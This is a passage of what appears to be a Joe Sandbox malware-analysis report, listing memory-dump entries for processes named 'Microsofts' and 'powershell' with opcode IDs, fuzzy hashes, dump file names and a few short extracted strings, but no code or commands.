                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0720552a81c877157a7c7107701540a6aa889b01f8f0e648905516fe43d53999
                                                                                                                                              • Instruction ID: c3817bc8ec57a9837a05c6e2dfb2c2d8c7f347e53df7172d34cd46a7f2f4bba7
                                                                                                                                              • Opcode Fuzzy Hash: 0720552a81c877157a7c7107701540a6aa889b01f8f0e648905516fe43d53999
                                                                                                                                              • Instruction Fuzzy Hash: 55F04F72A00109AFCB40EF79D8449BFBBF9EF4C210B004066F519D7261DA30DD118BA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9cb61fd8ac435948035664d9c18f49fa46a72c7aae919f47a72f57dd78c890e8
                                                                                                                                              • Instruction ID: 61c9b1f1bf985006a79eb50e21e26c2ee6913347efed62921784eb6ed1558e42
                                                                                                                                              • Opcode Fuzzy Hash: 9cb61fd8ac435948035664d9c18f49fa46a72c7aae919f47a72f57dd78c890e8
                                                                                                                                              • Instruction Fuzzy Hash: A3F0A7327045155BC715566AE454A6EB7AADFC5635B14007BE509DB3A0CF31DC02CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fc2aeeee4d5757546fe7b2ba77a54b519f59e82f58764f9d28cb2974546e5d89
                                                                                                                                              • Instruction ID: 9a4469584a0057a14522e0684d070f41306e97f871cbfdda2f132f05f0b0cf30
                                                                                                                                              • Opcode Fuzzy Hash: fc2aeeee4d5757546fe7b2ba77a54b519f59e82f58764f9d28cb2974546e5d89
                                                                                                                                              • Instruction Fuzzy Hash: BFF08236300219BB9F469E98D854DEF7FABEBC9260B00442AFA0AD3350DA318C5197A5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bcbc45c89370d5d5a022d568a04dc4bbd0155408e05000d8e16719dc05c7bc65
                                                                                                                                              • Instruction ID: 70b7490877cfe6a116c4184f36dfc41092435af4c5013b31c9d58395aaa4be9d
                                                                                                                                              • Opcode Fuzzy Hash: bcbc45c89370d5d5a022d568a04dc4bbd0155408e05000d8e16719dc05c7bc65
                                                                                                                                              • Instruction Fuzzy Hash: 02F0B476E002059F8B50DFADD981AAFBBF9FF48240B004536D505E3254E6309905CBE1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6dca5e7e179ea1a8109e9a69207a8bd9bac6f377d241dc3d303458b851b7f137
                                                                                                                                              • Instruction ID: 9780aa1ee51d70373580bbecfb8b90bcf8bc65dbbfb2c6ea6f52813b2707ae3a
                                                                                                                                              • Opcode Fuzzy Hash: 6dca5e7e179ea1a8109e9a69207a8bd9bac6f377d241dc3d303458b851b7f137
                                                                                                                                              • Instruction Fuzzy Hash: 25F08271E042089F8B50DFAED88099FBBFAFF88250B40453AD509D3254E6709915CBE1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ad2e6bea39467b03744268ce4406c99b22a3a8578c1503b6535aac5e6f3ab14a
                                                                                                                                              • Instruction ID: 475235c15ad3b54967d3666b9175f8369c5a0692421bb36593eb2b8176fadf3b
                                                                                                                                              • Opcode Fuzzy Hash: ad2e6bea39467b03744268ce4406c99b22a3a8578c1503b6535aac5e6f3ab14a
                                                                                                                                              • Instruction Fuzzy Hash: 03E0AE71461302CFD3202B20B4AC36A7A69EB0B3A7F94AD65E10AC1079DB715854CB05
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0865cef197c8c045a0591907d80fa898154b404aa927008e319b3f936399f877
                                                                                                                                              • Instruction ID: 0b04849338709906a51129e9c07295a8d11b5cbc6deafacd97e0b1e71ae35cfc
                                                                                                                                              • Opcode Fuzzy Hash: 0865cef197c8c045a0591907d80fa898154b404aa927008e319b3f936399f877
                                                                                                                                              • Instruction Fuzzy Hash: 5CE00974462306CFD2202B65B5AC67A7A79EB0B3A7F80BD24E20FC1079DF714854CB55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 693cf9a0a7744c8267a1d44b8b27ec20fab43672b5c46d281c6b533bc54f6833
                                                                                                                                              • Instruction ID: 774b9cf57cedaaa526c7c73d80bdc6686ba4a181ebe70ba071fd4e046c916cea
                                                                                                                                              • Opcode Fuzzy Hash: 693cf9a0a7744c8267a1d44b8b27ec20fab43672b5c46d281c6b533bc54f6833
                                                                                                                                              • Instruction Fuzzy Hash: 72E02631D202A79ECB229FE0AC114EEBB30FE92354B5143A7D0187B140EB351A4ECB62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 981ec2377d79c10cfcaa37fb1030f26aa3db6d60f0403685673593898656e3d8
                                                                                                                                              • Instruction ID: f564818c258936f25b46c981c509e20dcedba66d3fdd8a6b06686b910c533596
                                                                                                                                              • Opcode Fuzzy Hash: 981ec2377d79c10cfcaa37fb1030f26aa3db6d60f0403685673593898656e3d8
                                                                                                                                              • Instruction Fuzzy Hash: 06E026300083910ECB1BAB38EC668417F2EFB411447159A66D0814A16ADA70894A8320
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7372244176abdc9b08c287423691f7a6ed777fb53643a25f92186fe94e79f81b
                                                                                                                                              • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                                                              • Opcode Fuzzy Hash: 7372244176abdc9b08c287423691f7a6ed777fb53643a25f92186fe94e79f81b
                                                                                                                                              • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e497939ee7e5e8bc4f4784d06ee6ffbfd958b3dd4a3e9c0845c402a4efff91a1
                                                                                                                                              • Instruction ID: 9334a19655a3333d07f7820d097dde61db38380b2801c4beb86980be2e2636fa
                                                                                                                                              • Opcode Fuzzy Hash: e497939ee7e5e8bc4f4784d06ee6ffbfd958b3dd4a3e9c0845c402a4efff91a1
                                                                                                                                              • Instruction Fuzzy Hash: 35D0673AB40058EFCB049F98E8508DDFB76FB98321B049116EA15A3261C6319965DB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ce1ed87e58e1018c72bacc4b425a21d9531913e70f29f92e40e041353d73f76e
                                                                                                                                              • Instruction ID: 3ee86d4085ba8bc2e1713fb5cff2bcf8e7c1e30753d63ab212e47d191fe25a5a
                                                                                                                                              • Opcode Fuzzy Hash: ce1ed87e58e1018c72bacc4b425a21d9531913e70f29f92e40e041353d73f76e
                                                                                                                                              • Instruction Fuzzy Hash: 94C012300543194FCA49FB76F966D16772FAB80244750AA20D1060625DEF7859498694
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2cde2f53bf7a06f191c2bc64f49f947e1ac07f3aea2fb3e8303eff388166e2d1
                                                                                                                                              • Instruction ID: 6db14e6031d17f5d56bb206e8988816ea0f669347442ccf77974d0322fe24e9e
                                                                                                                                              • Opcode Fuzzy Hash: 2cde2f53bf7a06f191c2bc64f49f947e1ac07f3aea2fb3e8303eff388166e2d1
                                                                                                                                              • Instruction Fuzzy Hash: FBB01273DC838903DF264630C53F3D93B10DB6230EF6818EE8813C0285ED19C002C600
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (o]q$(o]q$(o]q$(o]q
                                                                                                                                              • API String ID: 0-1261621458
                                                                                                                                              • Opcode ID: 5ad23304ac55b2957ae77158c7bec00e94b47ddfd2fa669ef6c1f41a4f3bf43e
                                                                                                                                              • Instruction ID: 2ce62896d9e31a476cce0fbda8504387ad9819155ea4ac17deb5c7523e84ea67
                                                                                                                                              • Opcode Fuzzy Hash: 5ad23304ac55b2957ae77158c7bec00e94b47ddfd2fa669ef6c1f41a4f3bf43e
                                                                                                                                              • Instruction Fuzzy Hash: 99C15C30A002099FCB14CF69C995EAEBBF6BF49318F158599F816AB261D734ED41CF60
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                              • API String ID: 0-4015495023
                                                                                                                                              • Opcode ID: c362c99f16201033fa9d30f2d05364a2db3d1096606886a8d3cf5a9412ce90b3
                                                                                                                                              • Instruction ID: 421263238752ae5e491c8c81d290b78053c73d0bd02d0c08f1777f04e83ff762
                                                                                                                                              • Opcode Fuzzy Hash: c362c99f16201033fa9d30f2d05364a2db3d1096606886a8d3cf5a9412ce90b3
                                                                                                                                              • Instruction Fuzzy Hash: F2315470E0421A8BDF658EA989C43AEB7A6FF85310F144169C519A73E4EB30CD85DB92
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9de9db93f59b983817db382b7b7b0465fca84a747cf95ffc96c9438a83b04a2e
                                                                                                                                              • Instruction ID: 86efa945fdefdafe3ab20712337c48588adef5278def0c8114fe837e8cc55d58
                                                                                                                                              • Opcode Fuzzy Hash: 9de9db93f59b983817db382b7b7b0465fca84a747cf95ffc96c9438a83b04a2e
                                                                                                                                              • Instruction Fuzzy Hash: 02916175A007189BDB19EFB495505AEBBF2EFC4600B00C919D59AAF340EF385D06CBD6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 31e0b2b09d346d458c630a216ba9a4b4a31c361de700b1586be9e32ebeacb9fd
                                                                                                                                              • Instruction ID: e2de9bc23b2321f2192b8c7f950fb61ac34d6eadf3f744f0585c6c476e6384df
                                                                                                                                              • Opcode Fuzzy Hash: 31e0b2b09d346d458c630a216ba9a4b4a31c361de700b1586be9e32ebeacb9fd
                                                                                                                                              • Instruction Fuzzy Hash: AF915174B007199BDB19EFB495505AEBBE2EFC4600B00C91DD55AAF340EF346D068BD6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q$4']q$4']q$pisj$|,uj
                                                                                                                                              • API String ID: 0-3492023006
                                                                                                                                              • Opcode ID: b5781fae0d7cbafba646d205182fdff3e10f8dd992c258386d1835cbfc35bd2f
                                                                                                                                              • Instruction ID: 564784df1288d9fa7cfbeaa414887d41579272879fe0b5e6b5f25a95f497264e
                                                                                                                                              • Opcode Fuzzy Hash: b5781fae0d7cbafba646d205182fdff3e10f8dd992c258386d1835cbfc35bd2f
                                                                                                                                              • Instruction Fuzzy Hash: D31259B0B02306AFCB259B68845076AB7EAFFC5319F14847AD505CB251DF35D981C7E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq
                                                                                                                                              • API String ID: 0-600464949
                                                                                                                                              • Opcode ID: 1dd68a4b056f3205b86cf9e2eef83675cac5db2bd61452f4fc5ab2bec5d49721
                                                                                                                                              • Instruction ID: 3ea74ca743d2c255a100d73c0dedc316f0cfe587a101adb92afa063a4df84144
                                                                                                                                              • Opcode Fuzzy Hash: 1dd68a4b056f3205b86cf9e2eef83675cac5db2bd61452f4fc5ab2bec5d49721
                                                                                                                                              • Instruction Fuzzy Hash: AF413A34B042048FCB19EF68C454AAABBF6AF8E215F245098E406EB395CB35DC41CB65
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (&]q
                                                                                                                                              • API String ID: 0-1343553580
                                                                                                                                              • Opcode ID: 282af1c2085a697bb81275141efe216871215e9075918278465368f8bb6e6775
                                                                                                                                              • Instruction ID: 9099f941c83cea58fbf874be181b2fcd2e0b311c6272f2efb9849af804429ccc
                                                                                                                                              • Opcode Fuzzy Hash: 282af1c2085a697bb81275141efe216871215e9075918278465368f8bb6e6775
                                                                                                                                              • Instruction Fuzzy Hash: 9121DE71A042588FCB14EBAED4406AEBFF5EF89320F14846AD008A7340CB799805CFA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0ae844f0aa536e15fa61874e554cfd404a0ba8f105b8ee1518acabc395f4b94c
                                                                                                                                              • Instruction ID: a41473534063b4f8c8f784dfe56370b5363b4aacf691af4754c37a4b1e8d6db2
                                                                                                                                              • Opcode Fuzzy Hash: 0ae844f0aa536e15fa61874e554cfd404a0ba8f105b8ee1518acabc395f4b94c
                                                                                                                                              • Instruction Fuzzy Hash: 49917A70A002059FCB16DF5CC5949AAFBB1FF48310B258999D815AB3A5C736EC92CFA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4556bb1ef045e67cabcd1c754d4e6b79fa1280007e2df9a1efafe1fb6144c924
                                                                                                                                              • Instruction ID: d01af051a6cc2645b45b82ebb39bf1b91be290f1aeae504b2899c3d88be25eac
                                                                                                                                              • Opcode Fuzzy Hash: 4556bb1ef045e67cabcd1c754d4e6b79fa1280007e2df9a1efafe1fb6144c924
                                                                                                                                              • Instruction Fuzzy Hash: 415157B0B01306EFCB158B78C55166BBBEA9F95308B2484AAC901CF251DF35DC45C7E2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a84907b4d195f1cace312c45d176e2ce88df1394eeed658baee1cfb0e9332335
                                                                                                                                              • Instruction ID: accf510911b165276cdb9ef61926b9d1b4eca98f3106cd9bc9a60512129ba97c
                                                                                                                                              • Opcode Fuzzy Hash: a84907b4d195f1cace312c45d176e2ce88df1394eeed658baee1cfb0e9332335
                                                                                                                                              • Instruction Fuzzy Hash: 0B51D2353042059FD705EB79D844A6BBBEAFFCA214F2948A9D505CB392DB35DC01CB94
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7e49cf15892ad932a10589b87cbe5078c4ca84a057570fbedfe2a627c954e616
                                                                                                                                              • Instruction ID: 12c028fcd4fa96d577e419e7681b58a7b9a5bdcdefe26378a89dab745ab074d1
                                                                                                                                              • Opcode Fuzzy Hash: 7e49cf15892ad932a10589b87cbe5078c4ca84a057570fbedfe2a627c954e616
                                                                                                                                              • Instruction Fuzzy Hash: 2B612374E012489FCB14DFA9D584A8DBFF1FF88310F18806AE809AB265EB349845CF64
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d9ddac862a0b885a4cb36ea536b999b8116484d588aa991932e223613e026e7f
                                                                                                                                              • Instruction ID: 6a50ebe232614f55f8006f2c6b09e2db6e9a4d1331c88859523231652a08790f
                                                                                                                                              • Opcode Fuzzy Hash: d9ddac862a0b885a4cb36ea536b999b8116484d588aa991932e223613e026e7f
                                                                                                                                              • Instruction Fuzzy Hash: 04611375E002488FCB14DFA9D584A9DFBF5FF88310F19812AE809AB264EB349845CF64
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2323119219.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5f754c8fd2774bc1925021944aec879d3a7510b435fa05036c56fdf516173bf5
                                                                                                                                              • Instruction ID: 2b4d8bb7113784193918a1d6c72eea0702898b215889f5e44b4dcb7c51005fcc
                                                                                                                                              • Opcode Fuzzy Hash: 5f754c8fd2774bc1925021944aec879d3a7510b435fa05036c56fdf516173bf5
                                                                                                                                              • Instruction Fuzzy Hash: F63104F0A12302EBCB248F28C541A7AB7BAAF84748F24C4A9D9059F251DB35DC85C7E1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cd0a22950bdb2fc86316d84abad965d68659396fc1d7615b7b017084060d0563
                                                                                                                                              • Instruction ID: e1d39ab41083fde74d60623d4b34d42fe04542db7f5d95582e2d2c8fab90c49f
                                                                                                                                              • Opcode Fuzzy Hash: cd0a22950bdb2fc86316d84abad965d68659396fc1d7615b7b017084060d0563
                                                                                                                                              • Instruction Fuzzy Hash: B2413874A005059FCB06DF58C2989BAFBB1FF48310B1585A9D815AB364C732FC92CFA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a66869f146edab982474c64d7b7ca692e441b9fd42326d56839b8a7fb0efabed
                                                                                                                                              • Instruction ID: 89716b6125691298499da5e472c6ab70e9d72e32db0c9acbe4842ae40514f686
                                                                                                                                              • Opcode Fuzzy Hash: a66869f146edab982474c64d7b7ca692e441b9fd42326d56839b8a7fb0efabed
                                                                                                                                              • Instruction Fuzzy Hash: 8B3181353002019FC705EB68E894B9EB7DAEFC8215F048239D50ACB365DF74D80ACBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f24ed3648dd3a2ad2da2c84e520c82adf07b69b1b08dc873a6bfdf09de9a8195
                                                                                                                                              • Instruction ID: ee1193e0de33f4e92aa24043f61782f8c319e4181bc7d8372575baf639622a05
                                                                                                                                              • Opcode Fuzzy Hash: f24ed3648dd3a2ad2da2c84e520c82adf07b69b1b08dc873a6bfdf09de9a8195
                                                                                                                                              • Instruction Fuzzy Hash: 39310C34A002058FCB15DF64C598AA9BBF5EF8E315F2850A8E406EB3A5DB71DD41CF64
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cae67b318e277dbab6e99ad469645cb792c5341620809a50d47e9f004ced1c1f
                                                                                                                                              • Instruction ID: 51cde47a4bcd9f7c8d105b2e537cb1d88d93fc2934275fbb71d79c846c307ddc
                                                                                                                                              • Opcode Fuzzy Hash: cae67b318e277dbab6e99ad469645cb792c5341620809a50d47e9f004ced1c1f
                                                                                                                                              • Instruction Fuzzy Hash: 5F314A74E002098FDB04EFB9D4946AEBBF6AF89314F14806AE405EB254EB748C468F65
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f54b69c4dd46769498ca66115db9cd98aaf4380f19891344d509d21c76c5a7c9
                                                                                                                                              • Instruction ID: e214cd768983d04bbc73ddec4673799100912bb6da45c5f100ba1b59b99cf30e
                                                                                                                                              • Opcode Fuzzy Hash: f54b69c4dd46769498ca66115db9cd98aaf4380f19891344d509d21c76c5a7c9
                                                                                                                                              • Instruction Fuzzy Hash: 3E314C74E002098FDB04EFB9D4947AEBAF6EF88300F14806AE405EB354EB749C458FA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.2164073737.0000000003180000.00000040.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_3180000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
